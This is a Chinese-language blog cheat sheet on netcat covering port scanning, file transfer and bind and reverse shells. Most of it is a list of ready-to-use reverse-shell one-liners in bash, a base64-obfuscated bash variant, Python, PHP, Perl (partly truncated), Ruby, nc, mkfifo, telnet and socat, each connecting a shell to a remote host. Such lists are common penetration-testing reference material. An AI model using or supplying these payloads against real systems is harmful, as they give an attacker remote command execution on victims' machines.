NC概述:
- nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。
- 何为反弹shell?为什么不反弹攻击?
相信你有一天可以直接把所有攻击反弹回去的.
常用命令
banner获取
连接远程主机
端口扫描
1 2
|
nc -v ip port //指定端口 nc -v -z ip 1-1555 //指定端口段
|
文件传输
1 2
|
nc -lvp 8888 < test.txt 服务端 nc -nv 服务端ip 8888 > test.txt 客户端
|
获取shell
正向shell:客户端想要获取服务器shell
1 2 3 4 5
|
客户端监听 nc -lvp 8888 -e /bin/sh nc -lvp 8888 -e c:\windows\system32\cmd.exe 服务端反弹 nc 服务端ip 8888
|
反向shell:服务端想要获取客户端器shell
1 2 3 4 5
|
客户端监听 nc -lvp 8888 服务端反弹 nc ip 8888 -e /bin/sh nc ip 8888 -e c:\windows\system32\cmd.exe
|
没有nc是,由于各种环境不同,可以结合天时地利人和。
1 2 3 4
|
bash -i >& /dev/tcp/ip/port 0>&1 base64版 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}' 123
|
1 2
|
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" 1
|
1 2
|
php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");' 1
|
1 2
|
Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1
|
1 2
|
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 1
|
1
|
nc -e /bin/bash ip port
|
1
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f
|
1
|
TF=$(mktemp -u); mkfifo $TF && telnet ip port 0<$TF | /bin/sh 1>$TF
|
socat
1
|
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:106.xxx.xxx.115:9999
|
FROM :ol4three.com | Author:ol4three
评论